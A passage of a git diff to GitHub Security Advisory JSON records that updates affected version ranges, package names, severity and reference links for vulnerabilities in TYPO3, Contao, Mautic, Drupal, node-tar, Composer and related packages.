+ "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0005/" + }, { "type": "WEB", "url": "https://weblog.rubyonrails.org/2021/8/19/Rails-6-0-4-1-and-6-1-4-1-have-been-released/" diff --git a/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json b/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json index f253cfda7d5d6..71258b369b78a 100644 --- a/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json +++ b/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json @@ -30,7 +30,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { "fixed": "4.4.16" diff --git a/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json b/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json index e1149d75b685c..12e34842b5f3f 100644 --- a/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json +++ b/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c5c9-8c6m-727v", - "modified": "2021-10-21T13:56:39Z", + "modified": "2024-02-07T18:51:52Z", "published": "2021-08-19T15:53:12Z", "aliases": [ "CVE-2021-32768" @@ -32,10 +32,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 7.6.52" - } + ] }, { "package": { @@ -54,10 +51,45 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 8.7.41" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.2" + } + ] + } + ] }, { "package": { @@ -76,15 +108,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.28" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -98,15 +127,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.18" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -120,10 +146,64 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 11.3.1" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.29" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.42" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.6.53" + } + ] + } + ] } ], "references": [ @@ -139,6 +219,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32768" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32768.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32768.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2021-013" diff --git a/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json b/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json index ffb200dd6cb3f..8e6467f17095f 100644 --- a/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json +++ b/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.56" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.9.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.10.0" + }, + { + "fixed": "4.11.7" + } + ] + } + ] } ], "references": [ @@ -86,6 +143,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/privilege-escalation-with-the-form-generator.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-37627.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-37627.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json b/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json index ea54cfc14d5c6..4c7390e3811e9 100644 --- a/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json +++ b/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json @@ -34,6 +34,63 @@ } ] }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.56" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.9.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.10.0" + }, + { + "fixed": "4.11.7" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -44,7 +101,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.9.0" + "introduced": "4.5.0" }, { "fixed": "4.9.18" @@ -63,7 +120,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.11.0" + "introduced": "4.10.0" }, { "fixed": "4.11.7" @@ -86,6 +143,18 @@ "type": "WEB", "url": "https://contao.org/en/news/contao-4-9-16-and-4-11-5-are-available.html" }, + { + "type": "WEB", + "url": "https://contao.org/en/security-advisories/cross-site-scripting-via-html-attributes-in-the-back-end.html" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-35955.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-35955.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json b/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json index 418ddc9bb5a99..c8fbcdd49aa7c 100644 --- a/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json +++ b/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json @@ -30,7 +30,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { "fixed": "4.4.18" @@ -101,6 +101,14 @@ "type": "WEB", "url": "https://github.com/isaacs/node-tar/commit/1739408d3122af897caefd09662bce2ea477533b" }, + { + "type": "WEB", + "url": "https://github.com/isaacs/node-tar/commit/2f1bca027286c23e110b8dfc7efc10756fa3db5a" + }, + { + "type": "WEB", + "url": "https://github.com/isaacs/node-tar/commit/3aaf19b2501bbddb145d92b3322c80dcaed3c35f" + }, { "type": "WEB", "url": "https://github.com/isaacs/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455" @@ -109,6 +117,10 @@ "type": "WEB", "url": "https://github.com/isaacs/node-tar/commit/bb93ba243746f705092905da1955ac3b0509ba1e" }, + { + "type": "WEB", + "url": "https://github.com/isaacs/node-tar/commit/d56f790bda9fea807dd80c5083f24771dbdd6eb1" + }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" diff --git a/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json b/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json index b8d739855b659..81698fbd35d7c 100644 --- a/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json +++ b/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.56" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.9.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.10.0" + }, + { + "fixed": "4.11.7" + } + ] + } + ] } ], "references": [ @@ -86,6 +143,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/php-file-inclusion-via-insert-tags.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-37626.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-37626.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json b/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json index b7050a6080811..f9b8811e59553 100644 --- a/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json +++ b/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "mautic/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0-alpha1" + }, + { + "fixed": "4.0.0" + } + ] + } + ] } ], "references": [ @@ -48,6 +67,10 @@ "type": "WEB", "url": "https://github.com/mautic/mautic/commit/942cb6992df619fdf1c181bfad9e25d5d4178b6f" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27909.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/mautic/mautic" diff --git a/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json b/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json index ba74ba03dcb6c..291ff9e111720 100644 --- a/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json +++ b/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.0.0" + "introduced": "0" }, { - "fixed": "4.1.22" + "fixed": "3.1.3" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "4.0.0" }, { - "fixed": "3.1.3" + "fixed": "4.1.22" } ] } @@ -83,10 +83,18 @@ "type": "WEB", "url": "https://github.com/Codeception/Codeception/blob/4.1/ext/RunProcess.php#L52" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/codeception/codeception/CVE-2021-23420.yaml" + }, { "type": "WEB", "url": "https://github.com/JinYiTong/poc" }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-4574-qv3w-fcmg" + }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-PHP-CODECEPTIONCODECEPTION-1324585" diff --git a/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json b/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json index fd5518d616edb..e053db75a632a 100644 --- a/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json +++ b/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "mautic/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0-alpha1" + }, + { + "fixed": "4.0.0" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27911" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27911.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/mautic/mautic" diff --git a/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json b/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json index a86d67029c7b4..d4883a2c1fad5 100644 --- a/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json +++ b/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json @@ -74,6 +74,10 @@ } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/lcobucci/jwt/security/advisories/GHSA-7322-jrq4-x5hf" + }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41106" @@ -86,6 +90,10 @@ "type": "WEB", "url": "https://github.com/lcobucci/jwt/commit/c45bb8b961a8e742d8f6b88ef5ff1bd5cca5d01c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/lcobucci/jwt/CVE-2021-41106.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/lcobucci/jwt" diff --git a/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json b/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json index 4b50c90b17e98..63298792c9312 100644 --- a/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json +++ b/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "mautic/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0-alpha1" + }, + { + "fixed": "4.0.0" + } + ] + } + ] } ], "references": [ @@ -48,6 +67,10 @@ "type": "WEB", "url": "https://github.com/mautic/mautic/commit/e6a405975342f3cf86aa71927618d31d25135fa3" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27910.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/mautic/mautic" diff --git a/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json b/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json index 5c4087846a0b4..2ee647c5b241a 100644 --- a/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json +++ b/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "mautic/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0-alpha1" + }, + { + "fixed": "4.0.0" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27912" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27912.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/mautic/mautic" diff --git a/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json b/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json index 70dc2027ec2e8..8561e7c3bd1a7 100644 --- a/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json +++ b/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x7g2-wrrp-r6h3", - "modified": "2023-05-01T22:18:02Z", + "modified": "2024-02-05T15:50:17Z", "published": "2021-09-01T18:41:06Z", "aliases": [ "CVE-2021-27913" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "mautic/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0-alpha1" + }, + { + "fixed": "4.0.0" + } + ] + } + ] } ], "references": [ @@ -48,6 +67,10 @@ "type": "WEB", "url": "https://github.com/mautic/mautic/commit/d1cad766a2de74e6c6b89d6d78c2a5f2e36ba91c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27913.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/mautic/mautic" diff --git a/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json b/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json index 8a2fcea6851e2..0a32454d15ece 100644 --- a/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json +++ b/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json @@ -52,6 +52,120 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.67.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.6.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.67.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.6.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.1" + } + ] + } + ] } ], "references": [ @@ -59,6 +173,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11831" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2019-11831.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2019-11831.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/phar-stream-wrapper/CVE-2019-11831.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/phar-stream-wrapper" @@ -127,6 +253,10 @@ "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/36" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-psa-2019-007" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-psa-2019-007/" diff --git a/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json b/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json index 105dd357e6e30..c5d20e68448dd 100644 --- a/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json +++ b/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-657m-v5vm-f6rw", - "modified": "2021-11-01T21:06:16Z", + "modified": "2024-02-05T11:18:00Z", "published": "2021-10-05T20:23:47Z", "aliases": [ "CVE-2021-41113" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + }, + { + "fixed": "11.5.0" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://github.com/TYPO3/typo3/commit/fa51999203c5e5d913ecae5ea843ccb2b95fa33f" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-41113.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-41113.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" @@ -59,6 +86,10 @@ { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-006" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2021-014" } ], "database_specific": { @@ -66,7 +97,7 @@ "CWE-309", "CWE-352" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-10-05T18:48:07Z", "nvd_published_at": "2021-10-05T18:15:00Z" diff --git a/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json b/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json index 0eb332628d6bb..58e17e3b10265 100644 --- a/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json +++ b/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json @@ -82,7 +82,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "7.0" + "introduced": "7.0.0" }, { "fixed": "7.74" @@ -90,6 +90,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.74" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.8.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.9.0" + }, + { + "fixed": "8.9.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.8" + } + ] + } + ] } ], "references": [ @@ -97,10 +173,26 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13671" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13671.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13671.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/core" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/" diff --git a/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json b/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json index a66e153d8d1a8..078bf2d1c05ae 100644 --- a/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json +++ b/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json @@ -83,6 +83,14 @@ "type": "WEB", "url": "https://github.com/containerd/containerd/releases/tag/v1.5.7" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/" @@ -91,6 +99,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5002" diff --git a/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json b/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json index ecb3e0f59b223..424df8c472fce 100644 --- a/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json +++ b/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.0.0-alpha1" }, { "fixed": "2.1.9" @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/composer/composer/commit/ca5e2f8d505fd3bfac6f7c85b82f2740becbc0aa" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/composer/composer/CVE-2021-41116.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/composer/composer" diff --git a/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json b/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json index 